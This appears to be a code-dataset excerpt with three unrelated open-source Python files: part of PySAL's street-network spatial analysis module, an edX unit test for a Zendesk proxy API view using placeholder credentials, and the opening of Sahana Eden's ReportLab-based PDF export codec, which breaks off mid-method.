Value are a list of new point coordinates.
Example
-------
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
>>> ntw.snapobservations(ps.examples.get_path('crimes.shp'), 'crimes', attribute=True)
>>> npts = ntw.pointpatterns['crimes'].npoints
>>> sim = ntw.simulate_observations(npts)
>>> isinstance(sim, ps.network.network.SimulatedPointPattern)
True
"""
simpts = SimulatedPointPattern()
# Cumulative Network Length.
edges = []
lengths = np.zeros(len(self.edge_lengths))
for i, key in enumerate(self.edge_lengths.iterkeys()):
edges.append(key)
lengths[i] = self.edge_lengths[key]
stops = np.cumsum(lengths)
totallength = stops[-1]
if distribution is 'uniform':
nrandompts = np.random.uniform(0, totallength, size=(count,))
elif distribution is 'poisson':
nrandompts = np.random.uniform(0, totallength, size=(np.random.poisson(count),))
for i, r in enumerate(nrandompts):
idx = np.where(r < stops)[0][0]
assignment_edge = edges[idx]
distance_from_start = stops[idx] - r
# Populate the coordinates dict.
x0, y0 = self._newpoint_coords(assignment_edge, distance_from_start)
simpts.snapped_coordinates[i] = (x0, y0)
simpts.obs_to_node[assignment_edge[0]].append(i)
simpts.obs_to_node[assignment_edge[1]].append(i)
# Populate the distance to node.
simpts.dist_to_node[i] = {assignment_edge[0] : distance_from_start,
assignment_edge[1] : self.edge_lengths[edges[idx]] - distance_from_start}
simpts.points = simpts.snapped_coordinates
simpts.npoints = len(simpts.points)
return simpts
def enum_links_node(self, v0):
"""
Returns the edges (links) around node
Parameters
-----------
v0: int
Node id
Returns
-------
links: list
List of tuple edges adjacent to the node.
"""
links = []
neighbornodes = self.adjacencylist[v0]
for n in neighbornodes:
links.append(tuple(sorted([n, v0])))
return links
def node_distance_matrix(self):
self.alldistances = {}
nnodes = len(self.node_list)
self.distancematrix = np.empty((nnodes, nnodes))
for node in self.node_list:
distance, pred = util.dijkstra(self, self.edge_lengths, node, n=float('inf'))
pred = np.array(pred)
#tree = util.generatetree(pred) <---- something to look at in the future
tree = None
self.alldistances[node] = (distance, tree)
self.distancematrix[node] = distance
def allneighbordistances(self, sourcepattern, destpattern=None, fill_diagonal=None):
"""
Compute either all distances between i and j in a single point pattern or all
distances between each i from a source pattern and all j from a destination pattern.
Parameters
----------
sourcepattern: str
The key of a point pattern snapped to the network.
destpattern: str
(Optional) The key of a point pattern snapped to the network.
fill_diagonal: float, int
(Optional) Fill the diagonal of the cost matrix.
Default in None and will populate the diagonal with numpy.nan
Do not declare a destpattern for a custom fill_diagonal.
Returns
-------
nearest: array (n,n)
An array of shape (n,n) storing distances between all points.
"""
if not hasattr(self,'alldistances'):
self.node_distance_matrix()
# Source setup
src_indices = sourcepattern.points.keys()
nsource_pts = len(src_indices)
src_dist_to_node = sourcepattern.dist_to_node
src_nodes = {}
for s in src_indices:
e1, e2 = src_dist_to_node[s].keys()
src_nodes[s] = (e1, e2)
# Destination setup
symmetric = False
if destpattern is None:
symmetric = True
destpattern = sourcepattern
dest_indices = destpattern.points.keys()
ndest_pts = len(dest_indices)
dest_dist_to_node = destpattern.dist_to_node
dest_searchpts = copy.deepcopy(dest_indices)
dest_nodes = {}
for s in dest_indices:
e1, e2 = dest_dist_to_node[s].keys()
dest_nodes[s] = (e1, e2)
# Output setup
nearest = np.empty((nsource_pts, ndest_pts))
nearest[:] = np.inf
for p1 in src_indices:
# Get the source nodes and dist to source nodes.
source1, source2 = src_nodes[p1]
set1 = set(src_nodes[p1])
# Distance from node1 to p, distance from node2 to p.
sdist1, sdist2 = src_dist_to_node[p1].values()
if symmetric:
# Only compute the upper triangle if symmetric.
dest_searchpts.remove(p1)
for p2 in dest_searchpts:
dest1, dest2 = dest_nodes[p2]
set2 = set(dest_nodes[p2])
if set1 == set2: # same edge
x1,y1 = sourcepattern.snapped_coordinates[p1]
x2,y2 = destpattern.snapped_coordinates[p2]
xd = x1-x2
yd = y1-y2
nearest[p1,p2] = np.sqrt(xd*xd + yd*yd)
else:
ddist1, ddist2 = dest_dist_to_node[p2].values()
d11 = self.alldistances[source1][0][dest1]
d21 = self.alldistances[source2][0][dest1]
d12 = self.alldistances[source1][0][dest2]
d22 = self.alldistances[source2][0][dest2]
# Find the shortest distance from the path passing through each of the
# two origin nodes to the first destination node.
sd_1 = d11 + sdist1
sd_21 = d21 + sdist2
if sd_1 > sd_21:
sd_1 = sd_21
# Now add the point to node one distance on the destination edge.
len_1 = sd_1 + ddist1
# Repeat the prior but now for the paths entering at the second node
# of the second edge.
sd_2 = d12 + sdist1
sd_22 = d22 + sdist2
b = 0
if sd_2 > sd_22:
sd_2 = sd_22
b = 1
len_2 = sd_2 + ddist2
# Now find the shortest distance path between point 1 on edge 1 and
# point 2 on edge 2, and assign.
sp_12 = len_1
if len_1 > len_2:
sp_12 = len_2
nearest[p1, p2] = sp_12
if symmetric:
# Mirror the upper and lower triangle when symmetric.
nearest[p2,p1] = nearest[p1,p2]
# Populate the main diagonal when symmetric.
if symmetric:
if fill_diagonal == None:
np.fill_diagonal(nearest, np.nan)
else:
np.fill_diagonal(nearest, fill_diagonal)
return nearest
def nearestneighbordistances(self, sourcepattern, destpattern=None):
"""
Compute the interpattern nearest neighbor distances or the intrapattern
nearest neighbor distances between a source pattern and a destination pattern.
Parameters
----------
sourcepattern: str
The key of a point pattern snapped to the network.
destpattern: str
(Optional) The key of a point pattern snapped to the network.
Returns
-------
nearest: ndarray (n,2)
With column[:,0] containing the id of the nearest neighbor and
column [:,1] containing the distance.
"""
if not sourcepattern in self.pointpatterns.keys():
raise KeyError("Available point patterns are {}".format(self.pointpatterns.keys()))
if not hasattr(self,'alldistances'):
self.node_distance_matrix()
pt_indices = self.pointpatterns[sourcepattern].points.keys()
dist_to_node = self.pointpatterns[sourcepattern].dist_to_node
nearest = np.zeros((len(pt_indices), 2), dtype=np.float32)
nearest[:,1] = np.inf
if destpattern == None:
destpattern = sourcepattern
searchpts = copy.deepcopy(pt_indices)
searchnodes = {}
for s in searchpts:
e1, e2 = dist_to_node[s].keys()
searchnodes[s] = (e1, e2)
for p1 in pt_indices:
# Get the source nodes and dist to source nodes.
source1, source2 = searchnodes[p1]
sdist1, sdist2 = dist_to_node[p1].values()
searchpts.remove(p1)
for p2 in searchpts:
dest1, dest2 = searchnodes[p2]
ddist1, ddist2 = dist_to_node[p2].values()
source1_to_dest1 = sdist1 + self.alldistances[source1][0][dest1] + ddist1
source1_to_dest2 = sdist1 + self.alldistances[source1][0][dest2] + ddist2
source2_to_dest1 = sdist2 + self.alldistances[source2][0][dest1] + ddist1
source2_to_dest2 = sdist2 + self.alldistances[source2][0][dest2] + ddist2
if source1_to_dest1 < nearest[p1, 1]:
nearest[p1, 0] = p2
nearest[p1, 1] = source1_to_dest1
if source1_to_dest1 < nearest[p2, 1]:
nearest[p2, 0] = p1
nearest[p2, 1] = source1_to_dest1
if source1_to_dest2 < nearest[p1, 1]:
nearest[p1, 0] = p2
nearest[p1, 1] = source1_to_dest2
if source1_to_dest1 < nearest[p2, 1]:
nearest[p2, 0] = p1
nearest[p2, 1] = source1_to_dest2
if source2_to_dest1 < nearest[p1, 1]:
nearest[p1, 0] = p2
nearest[p1, 1] = source2_to_dest1
if source2_to_dest1 < nearest[p2, 1]:
nearest[p2, 0] = p1
nearest[p2, 1] = source2_to_dest1
if source2_to_dest2 < nearest[p1, 1]:
nearest[p1, 0] = p2
nearest[p1, 1] = source2_to_dest2
if source2_to_dest2 < nearest[p2, 1]:
nearest[p2, 0] = p1
nearest[p2, 1] = source2_to_dest2
return nearest
def NetworkF(self, pointpattern, nsteps=10, permutations=99,
threshold=0.2, distribution='uniform',
lowerbound=None, upperbound=None):
"""
Computes a network constrained F-Function
Parameters
----------
pointpattern: object
A PySAL point pattern object.
nsteps: int
The number of steps at which the count of the nearest neighbors
is computed.
permutations: int
The number of permutations to perform (default 99).
threshold: float
The level at which significance is computed.
-- 0.5 would be 97.5% and 2.5%
distribution: str
The distribution from which random points are sampled:
-- uniform or poisson
lowerbound: float
The lower bound at which the F-function is computed. (Default 0)
upperbound: float
The upper bound at which the F-function is computed.
Defaults to the maximum observed nearest neighbor distance.
Returns
-------
NetworkF: object
A network F class instance.
"""
return NetworkF(self, pointpattern, nsteps=nsteps,
permutations=permutations,threshold=threshold,
distribution=distribution,lowerbound=lowerbound,
upperbound=upperbound)
def NetworkG(self, pointpattern, nsteps=10, permutations=99,
threshold=0.5, distribution='uniform',
lowerbound=None, upperbound=None):
"""
Computes a network constrained G-Function
Parameters
----------
pointpattern: object
A PySAL point pattern object.
nsteps: int
The number of steps at which the count of the nearest neighbors
is computed.
permutations: int
The number of permutations to perform (default 99).
threshold: float
The level at which significance is computed.
-- 0.5 would be 97.5% and 2.5%
distribution: str
The distribution from which random points are sampled:
-- uniform or poisson
lowerbound: float
The lower bound at which the G-function is computed. (Default 0)
upperbound: float
The upper bound at which the G-function is computed.
Defaults to the maximum observed nearest neighbor distance.
Returns
-------
NetworkG: object
A network G class instance.
"""
return NetworkG(self, pointpattern, nsteps=nsteps,
permutations=permutations,threshold=threshold,
distribution=distribution,lowerbound=lowerbound,
upperbound=upperbound)
def NetworkK(self, pointpattern, nsteps=10, permutations=99,
threshold=0.5, distribution='uniform',
lowerbound=None, upperbound=None):
"""
Computes a network constrained K-Function
Parameters
----------
pointpattern: object
A PySAL point pattern object.
nsteps: int
The number of steps at which the count of the nearest neighbors
is computed.
permutations: int
The number of permutations to perform (default 99).
threshold: float
The level at which significance is computed.
-- 0.5 would be 97.5% and 2.5%
distribution: str
The distribution from which random points are sampled:
-- uniform or poisson
lowerbound: float
The lower bound at which the K-function is computed. (Default 0)
upperbound: float
The upper bound at which the K-function is computed.
Defaults to the maximum observed nearest neighbor distance.
Returns
-------
NetworkK: object
A network K class instance.
"""
return NetworkK(self, pointpattern, nsteps=nsteps,
permutations=permutations,threshold=threshold,
distribution=distribution,lowerbound=lowerbound,
upperbound=upperbound)
def segment_edges(self, distance):
"""
Segment all of the edges in the network at either a fixed distance or a fixed
number of segments.
Parameters
-----------
distance: float
The distance at which edges are split.
Returns
-------
sn: object
PySAL Network Object.
Example
-------
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
>>> n200 = ntw.segment_edges(200.0)
>>> len(n200.edges)
688
"""
sn = Network()
sn.adjacencylist = copy.deepcopy(self.adjacencylist)
sn.edge_lengths = copy.deepcopy(self.edge_lengths)
sn.edges = set(copy.deepcopy(self.edges))
sn.node_coords = copy.deepcopy(self.node_coords)
sn.node_list = copy.deepcopy(self.node_list)
sn.nodes = copy.deepcopy(self.nodes)
sn.pointpatterns = copy.deepcopy(self.pointpatterns)
sn.in_shp = self.in_shp
current_node_id = max(self.nodes.values())
newedges = set()
removeedges = set()
for e in sn.edges:
length = sn.edge_lengths[e]
interval = distance
totallength = 0
currentstart = startnode = e[0]
endnode = e[1]
# If the edge will be segmented remove the current edge from the adjacency list.
if interval < length:
sn.adjacencylist[e[0]].remove(e[1])
sn.adjacencylist[e[1]].remove(e[0])
sn.edge_lengths.pop(e, None)
removeedges.add(e)
else:
continue
while totallength < length:
currentstop = current_node_id
if totallength + interval > length:
currentstop = endnode
interval = length - totallength
totallength = length
else:
current_node_id += 1
currentstop = current_node_id
totallength += interval
# Compute the new node coordinate.
newx, newy = self._newpoint_coords(e, totallength)
# Update node_list.
if currentstop not in sn.node_list:
sn.node_list.append(currentstop)
# Update nodes and node_coords.
sn.node_coords[currentstop] = newx, newy
sn.nodes[(newx, newy)] = currentstop
# Update the adjacency list.
sn.adjacencylist[currentstart].append(currentstop)
sn.adjacencylist[currentstop].append(currentstart)
# Add the new edge to the edge dict.
# Iterating over this so we need to add after iterating.
newedges.add(tuple(sorted([currentstart, currentstop])))
# Modify edge_lengths.
sn.edge_lengths[tuple(sorted([currentstart, currentstop]))] = interval
# Increment the start to the stop.
currentstart = currentstop
sn.edges.update(newedges)
sn.edges.difference_update(removeedges)
sn.edges = list(sn.edges)
# Update the point pattern snapping.
for instance in sn.pointpatterns.itervalues():
sn._snap_to_edge(instance)
return sn
def savenetwork(self, filename):
"""
Save a network to disk as a binary file
Parameters
----------
filename: str
The filename where the network should be saved. This should be a full
path or the file is saved whereever this method is called from.
Example
--------
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
>>> ntw.savenetwork('mynetwork.pkl')
"""
with open(filename, 'wb') as networkout:
cPickle.dump(self, networkout, protocol=2)
@staticmethod
def loadnetwork(filename):
with open(filename, 'rb') as networkin:
self = cPickle.load(networkin)
return self
class PointPattern():
"""
A stub point pattern class used to store a point pattern. This class is monkey patched
with network specific attributes when the points are snapped to a network.
In the future this class may be replaced with a generic point
pattern class.
Parameters
----------
shapefile: str
The input shapefile.
idvariable: str
Field in the shapefile to use as an id variable.
attribute: bool
{False, True}
A flag to indicate whether all attributes are tagged to this class.
Attributes
----------
points: dict
Keys are the point ids.
Values are the coordinates.
npoints: int
The number of points.
"""
def __init__(self, shapefile, idvariable=None, attribute=False):
self.points = {}
self.npoints = 0
if idvariable:
ids = get_ids(shapefile, idvariable)
else:
ids = None
pts = ps.open(shapefile)
# Get attributes if requested
if attribute == True:
dbname = os.path.splitext(shapefile)[0] + '.dbf'
db = ps.open(dbname)
else:
db = None
for i, pt in enumerate(pts):
if ids and db:
self.points[ids[i]] = {'coordinates':pt, 'properties':db[i]}
elif ids and not db:
self.points[ids[i]] = {'coordinates':pt, 'properties':None}
elif not ids and db:
self.points[i] = {'coordinates':pt, 'properties':db[i]}
else:
self.points[i] = {'coordinates':pt, 'properties':None}
pts.close()
if db:
db.close()
self.npoints = len(self.points.keys())
class SimulatedPointPattern():
"""
Struct style class to mirror the Point Pattern Class.
If the PointPattern class has methods, it might make sense to
make this a child of that class.
This class is not intended to be used by the external user.
"""
def __init__(self):
self.npoints = 0
self.obs_to_edge = {}
self.obs_to_node = defaultdict(list)
self.dist_to_node = {}
self.snapped_coordinates = {}
class SortedEdges(OrderedDict):
def next_key(self, key):
next = self._OrderedDict__map[key][1]
if next is self._OrderedDict__root:
raise ValueError("{!r} is the last key.".format(key))
return next[2]
def first_key(self):
for key in self: return key
raise ValueError("No sorted edges remain.")
| bsd-3-clause | 1,811,475,940,539,009,500 | 34.225482 | 102 | 0.519608 | false |
edx-solutions/edx-platform | openedx/core/djangoapps/zendesk_proxy/tests/test_v0_views.py | 4 | 3905 | """Tests for zendesk_proxy views."""
from copy import deepcopy
import json
import ddt
from django.urls import reverse
from django.test.utils import override_settings
from mock import MagicMock, patch
import six
from six.moves import range
from openedx.core.djangoapps.zendesk_proxy.v0.views import ZENDESK_REQUESTS_PER_HOUR
from openedx.core.lib.api.test_utils import ApiTestCase
@ddt.ddt
@override_settings(
ZENDESK_URL="https://www.superrealurlsthataredefinitelynotfake.com",
ZENDESK_OAUTH_ACCESS_TOKEN="abcdefghijklmnopqrstuvwxyz1234567890"
)
class ZendeskProxyTestCase(ApiTestCase):
"""Tests for zendesk_proxy views."""
def setUp(self):
self.url = reverse('zendesk_proxy_v0')
self.request_data = {
'name': 'John Q. Student',
'tags': ['python_unit_test'],
'email': {
'from': '[email protected]',
'subject': 'Python Unit Test Help Request',
'message': "Help! I'm trapped in a unit test factory and I can't get out!",
}
}
return super(ZendeskProxyTestCase, self).setUp()
def test_post(self):
with patch('requests.post', return_value=MagicMock(status_code=201)) as mock_post:
response = self.request_without_auth(
'post',
self.url,
data=json.dumps(self.request_data),
content_type='application/json'
)
self.assertHttpCreated(response)
(mock_args, mock_kwargs) = mock_post.call_args
self.assertEqual(mock_args, ('https://www.superrealurlsthataredefinitelynotfake.com/api/v2/tickets.json',))
six.assertCountEqual(self, mock_kwargs.keys(), ['headers', 'data'])
self.assertEqual(
mock_kwargs['headers'],
{
'content-type': 'application/json',
'Authorization': 'Bearer abcdefghijklmnopqrstuvwxyz1234567890'
}
)
self.assertEqual(
json.loads(mock_kwargs['data']),
{
'ticket': {
'comment': {
'body': "Help! I'm trapped in a unit test factory and I can't get out!",
'uploads': None,
},
'custom_fields': None,
'requester': {
'email': '[email protected]',
'name': 'John Q. Student',
},
'subject': 'Python Unit Test Help Request',
'tags': ['python_unit_test'],
},
}
)
@ddt.data('name', 'tags', 'email')
def test_bad_request(self, key_to_delete):
test_data = deepcopy(self.request_data)
_ = test_data.pop(key_to_delete)
response = self.request_without_auth(
'post',
self.url,
data=json.dumps(test_data),
content_type='application/json'
)
self.assertHttpBadRequest(response)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'zendesk_proxy',
}
}
)
def test_rate_limiting(self):
"""
Confirm rate limits work as expected. Note that drf's rate limiting makes use of the default cache to enforce
limits; that's why this test needs a "real" default cache (as opposed to the usual-for-tests DummyCache)
"""
for _ in range(ZENDESK_REQUESTS_PER_HOUR):
self.request_without_auth('post', self.url)
response = self.request_without_auth('post', self.url)
self.assertEqual(response.status_code, 429)
| agpl-3.0 | -3,823,738,162,767,136,300 | 35.839623 | 119 | 0.544686 | false |
michaelhowden/eden | modules/s3/s3codecs/pdf.py | 4 | 56741 | # -*- coding: utf-8 -*-
"""
S3 Adobe PDF codec
@copyright: 2011-15 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3RL_PDF",)
try:
from cStringIO import StringIO # Faster, where available
except:
from StringIO import StringIO
from copy import deepcopy
import os
from gluon import *
from gluon import current
from gluon.storage import Storage
from gluon.contenttype import contenttype
from gluon.languages import lazyT
from ..s3codec import S3Codec
from ..s3utils import s3_unicode
# Import the specialist libraries
try:
from PIL import Image
from PIL import ImageOps
from PIL import ImageStat
PILImported = True
except(ImportError):
try:
import Image
import ImageOps
import ImageStat
PILImported = True
except(ImportError):
PILImported = False
try:
from reportlab.lib.enums import TA_CENTER, TA_RIGHT
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfgen import canvas
from reportlab.lib.fonts import tt2ps
from reportlab.rl_config import canvas_basefontname as _baseFontName
from reportlab.platypus import BaseDocTemplate, SimpleDocTemplate, PageTemplate
from reportlab.platypus.frames import Frame
from reportlab.platypus import Spacer, PageBreak, FrameBreak, Paragraph
from reportlab.platypus import Table, TableStyle
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.lib.units import inch
from reportlab.lib.units import cm
from reportlab.lib import colors
from reportlab.lib.colors import Color
from reportlab.lib.pagesizes import A4, LETTER, landscape, portrait
from reportlab.platypus.flowables import Flowable
from reportlab.pdfbase.ttfonts import TTFont
reportLabImported = True
except ImportError:
reportLabImported = False
BaseDocTemplate = object
inch = 72.0
canvas = Storage()
canvas.Canvas = None
PDF_WIDTH = 0
PDF_HEIGHT = 1
def set_fonts(self):
"""
DRY Helper function for all classes which use PDF to set the appropriate Fonts
"""
font_set = current.deployment_settings.get_pdf_export_font()
if font_set:
try:
font_name = font_set[0]
font_name_bold = font_set[1]
folder = current.request.folder
# Requires the font-files at /static/fonts/<font_name>.ttf
pdfmetrics.registerFont(TTFont(font_name, os.path.join(folder,
"static",
"fonts",
"%s.ttf" % font_name)))
pdfmetrics.registerFont(TTFont(font_name_bold, os.path.join(folder,
"static",
"fonts",
"%s.ttf" % font_name_bold)))
except:
current.log.error("%s Font not found: Please install it to see the correct fonts in PDF exports" % font_set[0])
# Use the default "Helvetica" and "Helvetica-Bold"
self.font_name = "Helvetica"
self.font_name_bold = "Helvetica-Bold"
else:
self.font_name = font_name
self.font_name_bold = font_name_bold
else:
# Use the default "Helvetica" and "Helvetica-Bold"
self.font_name = "Helvetica"
self.font_name_bold = "Helvetica-Bold"
# =============================================================================
class S3RL_PDF(S3Codec):
"""
Simple Report Labs PDF format codec
"""
def __init__(self):
"""
Constructor
"""
# Error codes
T = current.T
self.ERROR = Storage(
PIL_ERROR = "PIL (Python Image Library) not installed, images cannot be embedded in the PDF report",
RL_ERROR = "Python needs the ReportLab module installed for PDF export"
)
# Fonts
set_fonts(self)
# -------------------------------------------------------------------------
def encode(self, resource, **attr):
"""
Export data as a PDF document
@param resource: the resource
@param attr: dictionary of keyword arguments, in s3_rest_controller
passed through from the calling controller
@keyword request: the S3Request
@keyword method: "read" to not include a list view when no
component is specified
@keyword list_fields: fields to include in lists
@keyword pdf_componentname: enforce this component
@keyword pdf_groupby: how to group the results
@keyword pdf_orderby: how to sort rows (within any level of grouping)
@keyword pdf_callback: callback to be used rather than request
@keyword pdf_title: the title of the report
@keyword pdf_filename: the filename for the report
@keyword rheader: HTML page header (override by pdf_header)
@keyword rfooter: HTML page footer (override by pdf_footer)
@keyword pdf_header: callback to generate the HTML header
(overrides rheader)
@keyword pdf_footer: callback to generate the HTML footer,
or static HTML (overrides rfooter)
@keyword pdf_header_padding: add this amount of space between
the header and the body
@keyword pdf_footer_padding: add this amount of space between
the body and the footer
@keyword pdf_hide_comments: don't show the comments in a table
@keyword pdf_table_autogrow: Indicates that a table should grow to
fill the available space. Valid values:
H - Horizontal
V - Vertical
B - Both
@keyword pdf_paper_alignment: Portrait (default) or Landscape
@keyword use_colour: True to add colour to the cells. default False
@ToDo: Add Page Numbers in Footer:
http://www.blog.pythonlibrary.org/2013/08/12/reportlab-how-to-add-page-numbers/
"""
if not PILImported:
current.session.warning = self.ERROR.PIL_ERROR
if not reportLabImported:
current.session.error = self.ERROR.RL_ERROR
redirect(URL(extension=""))
# Settings
r = self.r = attr.get("request", None)
self.list_fields = attr.get("list_fields")
self.pdf_groupby = attr.get("pdf_groupby")
self.pdf_orderby = attr.get("pdf_orderby")
self.pdf_hide_comments = attr.get("pdf_hide_comments")
self.table_autogrow = attr.get("pdf_table_autogrow")
self.pdf_header_padding = attr.get("pdf_header_padding", 0)
self.pdf_footer_padding = attr.get("pdf_footer_padding", 0)
# Get the title & filename
now = current.request.now.isoformat()[:19].replace("T", " ")
title = attr.get("pdf_title")
if title == None:
title = "Report"
docTitle = "%s %s" % (title, now)
filename = attr.get("pdf_filename")
if filename is None:
if not isinstance(title, str):
# Must be str not unicode
title = title.encode("utf-8")
filename = "%s_%s.pdf" % (title, now)
elif len(filename) < 5 or filename[-4:] != ".pdf":
# Add extension
filename = "%s.pdf" % filename
self.filename = filename
# Get the Doc Template
paper_size = attr.get("paper_size")
pdf_paper_alignment = attr.get("pdf_paper_alignment", "Portrait")
doc = EdenDocTemplate(title=docTitle,
paper_size = paper_size,
paper_alignment = pdf_paper_alignment)
# Get the header
header_flowable = None
header = attr.get("pdf_header")
if not header:
header = attr.get("rheader")
if header:
header_flowable = self.get_html_flowable(header,
doc.printable_width)
if self.pdf_header_padding:
header_flowable.append(Spacer(1, self.pdf_header_padding))
# Get the footer
footer_flowable = None
footer = attr.get("pdf_footer")
if not footer:
footer = attr.get("rfooter")
if footer:
footer_flowable = self.get_html_flowable(footer,
doc.printable_width)
if self.pdf_footer_padding:
footer_flowable.append(Spacer(1, self.pdf_footer_padding))
# Build report template
# Get data for the body of the text
data = None
body_flowable = None
doc.calc_body_size(header_flowable, footer_flowable)
callback = attr.get("pdf_callback")
pdf_componentname = attr.get("pdf_componentname", None)
if callback:
# Get the document body from the callback
body_flowable = self.get_html_flowable(callback(r),
doc.printable_width)
elif pdf_componentname: # and resource.parent is None:
# Enforce a particular component
resource = current.s3db.resource(r.tablename,
components = [pdf_componentname],
id = r.id)
if pdf_componentname in resource.components:
component = resource.components[pdf_componentname]
body_flowable = self.get_resource_flowable(component, doc)
elif r.component or attr.get("method", "list") != "read":
# Use the requested resource
body_flowable = self.get_resource_flowable(resource, doc)
styleSheet = getSampleStyleSheet()
style = styleSheet["Normal"]
style.fontName = self.font_name
style.fontSize = 9
if not body_flowable:
body_flowable = [Paragraph("", style)]
self.normalstyle = style
# Build the PDF
doc.build(header_flowable,
body_flowable,
footer_flowable,
)
# Return the generated PDF
response = current.response
if response:
disposition = "attachment; filename=\"%s\"" % self.filename
response.headers["Content-Type"] = contenttype(".pdf")
response.headers["Content-disposition"] = disposition
return doc.output.getvalue()
# -------------------------------------------------------------------------
def get_html_flowable(self, rules, printable_width):
"""
Function to convert the rules passed in to a flowable.
The rules (for example) could be an rHeader callback
"""
if callable(rules):
# Callback to produce the HTML (e.g. rheader)
r = self.r
# Switch to HTML representation
representation = r.representation
r.representation = "html"
try:
html = rules(r)
except:
html = ""
r.representation = representation
else:
# Static HTML
html = rules
parser = S3html2pdf(pageWidth = printable_width,
exclude_class_list=["tabs"])
result = parser.parse(html)
return result
# -------------------------------------------------------------------------
def get_resource_flowable(self, resource, doc):
"""
Get a list of fields, if the list_fields attribute is provided
then use that to extract the fields that are required, otherwise
use the list of readable fields.
"""
fields = self.list_fields
if fields:
list_fields = [f for f in fields if f != "id"]
else:
list_fields = [f.name for f in resource.readable_fields()
if f.type != "id" and
f.name != "comments" or
not self.pdf_hide_comments]
get_vars = Storage(current.request.get_vars)
get_vars["iColumns"] = len(list_fields)
filter, orderby, left = resource.datatable_filter(list_fields, get_vars)
resource.add_filter(filter)
result = resource.select(list_fields,
left=left,
limit=None,
count=True,
getids=True,
orderby=orderby,
represent=True,
show_links=False)
# Now generate the PDF table
pdf_table = S3PDFTable(doc,
result["rfields"],
result["rows"],
groupby = self.pdf_groupby,
autogrow = self.table_autogrow,
body_height = doc.body_height,
).build()
return pdf_table
# =============================================================================
class EdenDocTemplate(BaseDocTemplate):
"""
The standard document template for eden reports
It allows for the following page templates:
1) First Page
2) Even Page
3) Odd Page
4) Landscape Page
"""
def __init__(self,
title = "Sahana Eden",
margin = (0.5 * inch, # top
0.3 * inch, # left
0.5 * inch, # bottom
0.3 * inch), # right
margin_inside = 0.0 * inch, # used for odd even pages
paper_size = None,
paper_alignment = "Portrait"):
"""
Set up the standard page templates
"""
self.output = StringIO()
self.defaultPage = paper_alignment
if paper_size:
self.paper_size = paper_size
else:
if current.deployment_settings.get_paper_size() == "Letter":
self.paper_size = LETTER
else:
self.paper_size = A4
self.topMargin = margin[0]
self.leftMargin = margin[1]
self.bottomMargin = margin[2]
self.rightMargin = margin[3]
self.insideMargin = margin_inside
BaseDocTemplate.__init__(self,
self.output,
title = title,
leftMargin = self.leftMargin,
rightMargin = self.rightMargin,
topMargin = self.topMargin,
bottomMargin = self.bottomMargin,
)
self.MINIMUM_MARGIN_SIZE = 0.2 * inch
self.body_flowable = None
self._calc()
# -------------------------------------------------------------------------
def get_flowable_size(self, flowable):
"""
Function to return the size a flowable will require
"""
if not flowable:
return (0, 0)
if not isinstance(flowable, list):
flowable = [flowable]
w = 0
h = 0
for f in flowable:
if f:
size = f.wrap(self.printable_width,
self.printable_height)
if size[0] > w:
w = size[PDF_WIDTH]
h += size[PDF_HEIGHT]
return (w, h)
# -------------------------------------------------------------------------
def _calc(self):
if self.defaultPage == "Landscape":
self.pagesize = landscape(self.paper_size)
else:
self.pagesize = portrait(self.paper_size)
BaseDocTemplate._calc(self)
self.height = self.pagesize[PDF_HEIGHT]
self.width = self.pagesize[PDF_WIDTH]
self.printable_width = self.width - \
self.leftMargin - \
self.rightMargin - \
self.insideMargin
self.printable_height = self.height - \
self.topMargin - \
self.bottomMargin
# -------------------------------------------------------------------------
def calc_body_size(self,
header_flowable,
footer_flowable,
):
"""
Helper function to calculate the various sizes of the page
"""
self._calc() # in case we changed margins sizes etc
self.height = self.pagesize[PDF_HEIGHT]
self.width = self.pagesize[PDF_WIDTH]
self.printable_width = self.width - \
self.leftMargin - \
self.rightMargin - \
self.insideMargin
self.printable_height = self.height - \
self.topMargin - \
self.bottomMargin
header_size = self.get_flowable_size(header_flowable)
footer_size = self.get_flowable_size(footer_flowable)
self.header_height = header_size[PDF_HEIGHT]
self.footer_height = footer_size[PDF_HEIGHT]
self.body_height = self.printable_height - \
self.header_height - \
self.footer_height
# -------------------------------------------------------------------------
def build(self,
header_flowable,
body_flowable,
footer_flowable,
canvasmaker=canvas.Canvas):
"""
Build the document using the flowables.
Set up the page templates that the document can use
"""
self.header_flowable = header_flowable
self.body_flowable = body_flowable
self.footer_flowable = footer_flowable
self.calc_body_size(header_flowable,
footer_flowable,
)
showBoundary = 0 # for debugging set to 1, otherwise 0
body_frame = Frame(self.leftMargin,
self.bottomMargin + self.footer_height,
self.printable_width,
self.body_height,
leftPadding = 0,
bottomPadding = 0,
rightPadding = 0,
topPadding = 0,
id = "body",
showBoundary = showBoundary
)
self.body_frame = body_frame
self.normalPage = PageTemplate(id = "Normal",
frames = [body_frame,],
onPage = self.add_page_decorators,
pagesize = self.pagesize
)
# @todo set these page templates up
#self.evenPage = PageTemplate(id="even",
# frames=frame_list,
# onPage=self.onEvenPage,
# pagesize=self.pagesize
# )
#self.oddPage = PageTemplate(id="odd",
# frames=frame_list,
# onPage=self.onOddPage,
# pagesize=self.pagesize
# )
self.landscapePage = PageTemplate(id="Landscape",
frames = [body_frame,],
onPage=self.add_page_decorators,
pagesize=landscape(self.pagesize)
)
if self.defaultPage == "Landscape":
